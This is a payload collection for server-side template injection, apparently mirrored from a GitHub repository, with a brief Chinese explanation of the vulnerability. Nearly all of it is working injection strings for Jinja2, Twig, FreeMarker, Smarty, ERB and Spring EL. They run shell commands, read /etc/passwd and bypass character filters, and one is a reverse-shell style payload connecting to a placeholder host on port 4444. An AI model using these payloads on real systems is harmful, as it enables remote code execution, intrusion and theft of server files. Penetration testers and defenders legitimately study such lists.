ssti payloads
1.0.0
服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后将其执行服务器端。
模板引擎旨在通过将固定模板与挥发性数据相结合来生成网页。当将用户输入直接连接到模板中,而不是通过AS DATA传递时,服务器端模板注入攻击可能会发生。这允许攻击者注入任意模板指令,以操纵模板引擎,通常使他们能够完全控制服务器。顾名思义,服务器端模板注入有效载荷已交付和评估服务器端,这可能使其比典型的客户端模板注入更危险。
服务器端模板注射漏洞可以根据所讨论的模板引擎以及应用程序如何使用它,将网站暴露于各种攻击中。在某些极少数情况下,这些漏洞没有真正的安全风险。但是,大多数情况下,服务器端模板注入的影响可能是灾难性的。
在严重的规模末端,攻击者可以可能实现远程代码执行,完全控制后端服务器并使用它对内部基础结构进行其他攻击。
即使在无法执行完整的远程代码执行的情况下,攻击者通常仍然可以使用服务器端模板注入作为许多其他攻击的基础,从而有可能获得对服务器上敏感数据和任意文件的访问。
{{ 2 * 2 }}[[ 3 * 3 ]]
{{ 3 * 3 }}
{{ 3 * '3' }}
< %= 3 * 3 % >
${ 6 * 6 }
${{ 3 * 3 }}
@( 6 + 5 )
#{3*3}
#{ 3 * 3 }
{{ dump ( app )}}
{{ app . request . server . all | join ( ',' )}}
{{ config . items ()}}
{{ []. class . base . subclasses () }}
{{ '' . class . mro ()[ 1 ]. subclasses ()}}
{{ '' . __class__ . __mro__ [ 2 ]. __subclasses__ () }}
{{ '' . __class__ . __base__ . __subclasses__ ()}} # Search for Popen process, use payload below change 227 to index of Popen
{{ '' . __class__ . __base__ . __subclasses__ ()[ 227 ]( 'cat /etc/passwd' , shell = True , stdout = - 1 ). communicate ()}}
{ % for key , value in config . iteritems () % } < dt > {{ key | e }} < / dt > < dd > {{ value | e }} < / dd > { % endfor % }
{{ 'a' . toUpperCase ()}}
{{ request }}
{{ self }}
< %= File . open ( '/etc/passwd' ). read % >
< #assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[ #assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${ "freemarker.template.utility.Execute" ? new ()( "id" )}
{{ app . request . query . filter ( 0 , 0 , 1024 ,{ 'options' : 'system' })}}
{{ '' . __class__ . __mro__ [ 2 ]. __subclasses__ ()[ 40 ]( '/etc/passwd' ). read () }}
{{ config . items ()[ 4 ][ 1 ]. __class__ . __mro__ [ 2 ]. __subclasses__ ()[ 40 ]( "/etc/passwd" ). read () }}
{{ '' . __class__ . mro ()[ 1 ]. __subclasses__ ()[ 396 ]( 'cat /etc/passwd' , shell = True , stdout = - 1 ). communicate ()[ 0 ]. strip ()}}
{{ config . __class__ . __init__ . __globals__ [ 'os' ]. popen ( 'ls' ). read ()}}
{ % for x in (). __class__ . __base__ . __subclasses__ () % }{ % if "warning" in x . __name__ % }{{ x (). _module . __builtins__ [ '__import__' ]( 'os' ). popen ( request . args . input ). read ()}}{ % endif % }{ % endfor % }
{$ smarty . version }
{ php } echo `id` ;{ / php }
{{[ 'id' ] | filter ( 'system' )}}
{{[ 'cat x20 /etc/passwd' ] | filter ( 'system' )}}
{{[ 'cat$IFS/etc/passwd' ] | filter ( 'system' )}}
{{ request | attr ([ request . args . usc * 2 , request . args . class , request . args . usc * 2 ] | join )}}
{{ request | attr ([ "_" * 2 , "class" , "_" * 2 ] | join )}}
{{ request | attr ([ "__" , "class" , "__" ] | join )}}
{{ request | attr ( "__class__" )}}
{{ request . __class__ }}
{{ request | attr ( 'application' ) | attr ( ' x5f x5f globals x5f x5f ' ) | attr ( ' x5f x5f getitem x5f x5f ' )( ' x5f x5f builtins x5f x5f ' ) | attr ( ' x5f x5f getitem x5f x5f ' )( ' x5f x5f import x5f x5f ' )( 'os' ) | attr ( 'popen' )( 'id' ) | attr ( 'read' )()}}
{{ 'a' . getClass (). forName ( 'javax.script.ScriptEngineManager' ). newInstance (). getEngineByName ( 'JavaScript' ). eval ( " new java . lang . String ( 'xxx' ) " )}}
{{ 'a' . getClass (). forName ( 'javax.script.ScriptEngineManager' ). newInstance (). getEngineByName ( 'JavaScript' ). eval ( " var x = new java . lang . ProcessBuilder ; x . command ( \ " whoami \ " ); x . start () " )}}
{{ 'a' . getClass (). forName ( 'javax.script.ScriptEngineManager' ). newInstance (). getEngineByName ( 'JavaScript' ). eval ( " var x = new java . lang . ProcessBuilder ; x . command ( \ " netstat \ " ); org . apache . commons . io . IOUtils . toString ( x . start (). getInputStream ()) " )}}
{{ 'a' . getClass (). forName ( 'javax.script.ScriptEngineManager' ). newInstance (). getEngineByName ( 'JavaScript' ). eval ( " var x = new java . lang . ProcessBuilder ; x . command ( \ " uname \ " , \ " - a \ " ); org . apache . commons . io . IOUtils . toString ( x . start (). getInputStream ()) " )}}
{ % for x in (). __class__ . __base__ . __subclasses__ () % }{ % if "warning" in x . __name__ % }{{ x (). _module . __builtins__ [ '__import__' ]( 'os' ). popen ( "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(( " ip " ,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([ " /bin/cat " , " /etc/passwd " ]);'" ). read (). zfill ( 417 )}}{ % endif % }{ % endfor % }
${ T ( java . lang . System ). getenv ()}
${ T ( java . lang . Runtime ). getRuntime (). exec ( 'cat etc/passwd' )}
${ T ( org . apache . commons . io . IOUtils ). toString ( T ( java . lang . Runtime ). getRuntime (). exec ( T ( java . lang . Character ). toString ( 99 ). concat ( T ( java . lang . Character ). toString ( 97 )). concat ( T ( java . lang . Character ). toString ( 116 )). concat ( T ( java . lang . Character ). toString ( 32 )). concat ( T ( java . lang . Character ). toString ( 47 )). concat ( T ( java . lang . Character ). toString ( 101 )). concat ( T ( java . lang . Character ). toString ( 116 )). concat ( T ( java . lang . Character ). toString ( 99 )). concat ( T ( java . lang . Character ). toString ( 47 )). concat ( T ( java . lang . Character ). toString ( 112 )). concat ( T ( java . lang . Character ). toString ( 97 )). concat ( T ( java . lang . Character ). toString ( 115 )). concat ( T ( java . lang . Character ). toString ( 115 )). concat ( T ( java . lang . Character ). toString ( 119 )). concat ( T ( java . lang . Character ). toString ( 100 ))). getInputStream ())} root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git
root@ismailtasdelen:~# git clone [email protected]:payloadbox/ssti-payloads.git
支持作者:
